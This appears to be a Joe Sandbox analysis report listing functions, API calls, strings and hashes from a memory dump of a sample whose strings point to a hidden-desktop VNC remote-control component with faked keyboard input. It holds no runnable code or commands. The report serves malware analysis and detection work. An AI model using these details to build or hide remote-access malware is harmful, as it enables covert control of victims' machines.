                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FlushObjectSelect
                                                                            • String ID:
                                                                            • API String ID: 2071645339-0
                                                                            • Opcode ID: aae6b1b2f4783f6f5e23d49270f9574a5a39ea57b095736f451dd763dd412b48
                                                                            • Instruction ID: d646a386c5015cba851baca9d16dd3e1acc688bc3c884f1110e0a5cca0c97acb
                                                                            • Opcode Fuzzy Hash: aae6b1b2f4783f6f5e23d49270f9574a5a39ea57b095736f451dd763dd412b48
                                                                            • Instruction Fuzzy Hash: F8517E729097C19AE7608F25E4443797BA0EB46B8EF180536DEC987765CFBCE484C708
                                                                            Function 00007FF6C2C3CC70 Relevance: 7.6, APIs: 5, Instructions: 105COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _lock$_errno_getptd_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 2808128820-0
                                                                            • Opcode ID: 293906f060d6459fee2b9c3bdc37a31292350123b62cfc1943e27c937da36d0d
                                                                            • Instruction ID: f59ebba1e43608d1b109421a7ec28babf2e6a1c2ae39f1223075783989d0ad41
                                                                            • Opcode Fuzzy Hash: 293906f060d6459fee2b9c3bdc37a31292350123b62cfc1943e27c937da36d0d
                                                                            • Instruction Fuzzy Hash: 45416B21A0968281FB94AF21A9017FA66B1BF45BCEF504935EF8D87796DFACA501C700
                                                                            Function 00007FF6C2C37A88 Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DecodePointer.KERNEL32(?,?,00000000,00007FF6C2C37B9D,?,?,?,?,00007FF6C2C379F3), ref: 00007FF6C2C37AB1
                                                                            • DecodePointer.KERNEL32(?,?,00000000,00007FF6C2C37B9D,?,?,?,?,00007FF6C2C379F3), ref: 00007FF6C2C37AC1
                                                                              • Part of subcall function 00007FF6C2C43480: _errno.LIBCMT ref: 00007FF6C2C43489
                                                                              • Part of subcall function 00007FF6C2C43480: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C2C43494
                                                                            • EncodePointer.KERNEL32(?,?,00000000,00007FF6C2C37B9D,?,?,?,?,00007FF6C2C379F3), ref: 00007FF6C2C37B3F
                                                                              • Part of subcall function 00007FF6C2C43370: realloc.LIBCMT ref: 00007FF6C2C4339B
                                                                              • Part of subcall function 00007FF6C2C43370: Sleep.KERNEL32(?,?,00000000,00007FF6C2C37B2F,?,?,00000000,00007FF6C2C37B9D,?,?,?,?,00007FF6C2C379F3), ref: 00007FF6C2C433B7
                                                                            • EncodePointer.KERNEL32(?,?,00000000,00007FF6C2C37B9D,?,?,?,?,00007FF6C2C379F3), ref: 00007FF6C2C37B4F
                                                                            • EncodePointer.KERNEL32(?,?,00000000,00007FF6C2C37B9D,?,?,?,?,00007FF6C2C379F3), ref: 00007FF6C2C37B5C
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
                                                                            • String ID:
                                                                            • API String ID: 1909145217-0
                                                                            • Opcode ID: 17a63d5b591e686c9ca2fe18f5a8febc498bada363ee497b58ea7ee50b63046d
                                                                            • Instruction ID: 6aba89a991fbb0de48d3e9cd5e830c89b6ce326f36e31552027d9b0a281adb46
                                                                            • Opcode Fuzzy Hash: 17a63d5b591e686c9ca2fe18f5a8febc498bada363ee497b58ea7ee50b63046d
                                                                            • Instruction Fuzzy Hash: 7D216D21B0A74241EA809F51F9480F963B1BF48BCEF544835DF8D87765EEBCE4A98340
                                                                            Function 00007FF6C2BADAF0 Relevance: 7.6, APIs: 5, Instructions: 52COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalDeleteSection$FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3328731263-0
                                                                            • Opcode ID: 8aae7b92523719c6034b62ab641376894423f86d000e2d8d74b437424aa0e4fe
                                                                            • Instruction ID: 13c55606c2d7459e67b315a6c4f1dc28e721a861f250b2787aea511c5047b7fa
                                                                            • Opcode Fuzzy Hash: 8aae7b92523719c6034b62ab641376894423f86d000e2d8d74b437424aa0e4fe
                                                                            • Instruction Fuzzy Hash: 53214425709A82A5DA88DF20D5A02F97370FF45759F440532CBED837A1CFACE164D350
                                                                            Function 00007FF6C2BA9390 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 50COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalEnterSectionclosesocketshutdown
                                                                            • String ID: c$vncclient.cpp : enable update thread$vncclient.cpp : enable/disable synced$vncclient.cpp : protocol enabled too many times!
                                                                            • API String ID: 3339156387-1190838069
                                                                            • Opcode ID: ef05844faa1cd020fc3eb9c414a04fab55e6cb55e3cee0b01a28a687e8f68859
                                                                            • Instruction ID: 59a7564b5a547b65e8cc0d9ee86b0d83dd66ebf0a624a3fd0ccbfd533dd91296
                                                                            • Opcode Fuzzy Hash: ef05844faa1cd020fc3eb9c414a04fab55e6cb55e3cee0b01a28a687e8f68859
                                                                            • Instruction Fuzzy Hash: 6C212971A18A8282EB50DF25D8402F93365FB89B9DF484232DE9DC73A5DFBCD4058340
                                                                            Function 00007FF6C2B97A30 Relevance: 7.5, APIs: 5, Instructions: 32COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$CriticalInitializeSection
                                                                            • String ID:
                                                                            • API String ID: 4164307405-0
                                                                            • Opcode ID: c4fdc54b808940450c7e6836e95b05b7c8ed45843037277cd8a2a281f8498f58
                                                                            • Instruction ID: 7daaed739751b8325d473ed16f8c57f04a8d8a63f07906fd88af5228debf1ed6
                                                                            • Opcode Fuzzy Hash: c4fdc54b808940450c7e6836e95b05b7c8ed45843037277cd8a2a281f8498f58
                                                                            • Instruction Fuzzy Hash: 0001CE72504B4182DB40CF25E9840A8B3B8FBA8B99B140136CF8D867A8CF78C8A5C380
                                                                            Function 00007FF6C2BA3220 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: gethostbynamesprintf
                                                                            • String ID: %d.$IP address unavailable
                                                                            • API String ID: 4032199589-2983120142
                                                                            • Opcode ID: 1844eddde6bdd16f9ed8f1280075efd27ff06d6aa399f9eaa6a91d19b8d539c6
                                                                            • Instruction ID: a84a174758250e37a31f28f3de7395acb4cebb8263116f52cc4c768f05b613cd
                                                                            • Opcode Fuzzy Hash: 1844eddde6bdd16f9ed8f1280075efd27ff06d6aa399f9eaa6a91d19b8d539c6
                                                                            • Instruction Fuzzy Hash: 4A41A022618A8581E660CF25A84016AB7B0FB85BF9F445735EFEE83BD5DF7CD0558700
                                                                            Function 00007FF6C2BB08E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadCursorA.USER32 ref: 00007FF6C2BB0925
                                                                              • Part of subcall function 00007FF6C2BAD930: InitializeCriticalSection.KERNEL32 ref: 00007FF6C2BAD95E
                                                                              • Part of subcall function 00007FF6C2BAD930: InitializeCriticalSection.KERNEL32 ref: 00007FF6C2BAD9EB
                                                                              • Part of subcall function 00007FF6C2BAD930: LoadLibraryA.KERNEL32 ref: 00007FF6C2BADA0D
                                                                              • Part of subcall function 00007FF6C2BAD930: GetProcAddress.KERNEL32 ref: 00007FF6C2BADA30
                                                                              • Part of subcall function 00007FF6C2BAD930: LoadLibraryA.KERNEL32 ref: 00007FF6C2BADA51
                                                                              • Part of subcall function 00007FF6C2BAD930: GetProcAddress.KERNEL32 ref: 00007FF6C2BADA6D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load$AddressCriticalInitializeLibraryProcSection$Cursormalloc
                                                                            • String ID: vncDesktopSW.cpp : SWinit $vncdesktop.cpp : failed to start hook thread$vncdesktop.cpp : initialising desktop handler
                                                                            • API String ID: 2513085289-3031267129
                                                                            • Opcode ID: 1873326b8f4cfb085588ecdcb6f02ef7e0e864c911988560d8123a10f1f5999c
                                                                            • Instruction ID: 00f5fc83e6842f0fcacc81e34be896bd805648454ad3c64a6e91487598b908e7
                                                                            • Opcode Fuzzy Hash: 1873326b8f4cfb085588ecdcb6f02ef7e0e864c911988560d8123a10f1f5999c
                                                                            • Instruction Fuzzy Hash: 5F218B31608B8282E7489F60E9401E9B3A8FB49B98F440636DBEC93795DFBCE021C300
                                                                            Function 00007FF6C2BEA130 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DesktopInputOpen
                                                                            • String ID: Default
                                                                            • API String ID: 601053899-753088835
                                                                            • Opcode ID: 70adbaaf15933b6300e773d9a6368acce56cf68ba5067fbfdfb46543feca4f4b
                                                                            • Instruction ID: e6f80fbaa10bbdb891a9661d1bf8b7229dc3481040dcdd5e7ba96bb716820060
                                                                            • Opcode Fuzzy Hash: 70adbaaf15933b6300e773d9a6368acce56cf68ba5067fbfdfb46543feca4f4b
                                                                            • Instruction Fuzzy Hash: 74215B35A18A8282EAA5CF11A4117EA73A5FB8A749F840471DECD83B94DFBCD018CB40
                                                                            Function 00007FF6C2B8A830 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • HideDesktop.cpp : Failed to restore SPI value for 0x%04x (0x%08x), xrefs: 00007FF6C2B8A89F
                                                                            • HideDesktop.cpp : Restored SPI value for 0x%04x to 0x%08x, xrefs: 00007FF6C2B8A8B0
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorInfoLastParametersSystem
                                                                            • String ID: HideDesktop.cpp : Failed to restore SPI value for 0x%04x (0x%08x)$HideDesktop.cpp : Restored SPI value for 0x%04x to 0x%08x
                                                                            • API String ID: 2777246624-1049114938
                                                                            • Opcode ID: cfadfbb5a052f751d6cf6726dcbde3c23d3e636a514a63c68ec439c87cd35a12
                                                                            • Instruction ID: 8ef01eaafd1a70f6a8b6544f39f456abe49313fd60ec8403e3af22bb2dd65b36
                                                                            • Opcode Fuzzy Hash: cfadfbb5a052f751d6cf6726dcbde3c23d3e636a514a63c68ec439c87cd35a12
                                                                            • Instruction Fuzzy Hash: 73213A36A08B8286E7548F11E8406A977A0FB8574EF540136DFCE97B58DFBCE546CB40
                                                                            Function 00007FF6C2BD02A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Virtual
                                                                            • String ID: fake %d down$fake %d up
                                                                            • API String ID: 4278518827-2496597273
                                                                            • Opcode ID: 2dd47c5dbc9ba7f1d5e19d4c12577b772ebabe815dd6ee617f8e27d02d3a68ea
                                                                            • Instruction ID: 2374b1c69eb53d261adbecaac69d7e43bfa42feba4cb3e8f6dedd45cedf5222f
                                                                            • Opcode Fuzzy Hash: 2dd47c5dbc9ba7f1d5e19d4c12577b772ebabe815dd6ee617f8e27d02d3a68ea
                                                                            • Instruction Fuzzy Hash: BC010421F0828182E3509F26A0401BD7BA2AF8970DF58C436DECD833A6CEBCD446C740
                                                                            Function 00007FF6C2BEA220 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30threadCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ProcessWindow$CurrentFindThread
                                                                            • String ID: WinVNC Tray Icon
                                                                            • API String ID: 1332243453-1071638575
                                                                            • Opcode ID: 1aaacc56bcc0b6efd1821309f0f7cb6d3b786fcd9035491e51b5987c9fdb7900
                                                                            • Instruction ID: 2170a589e11191cb86af353ce657d8dbc939bf29c9d0fef4e40003e8fd66a1bb
                                                                            • Opcode Fuzzy Hash: 1aaacc56bcc0b6efd1821309f0f7cb6d3b786fcd9035491e51b5987c9fdb7900
                                                                            • Instruction Fuzzy Hash: 46F03021A1874182EB949F56B481479A2A0FF8878AF891076EF9E86754EF7CD485CB40
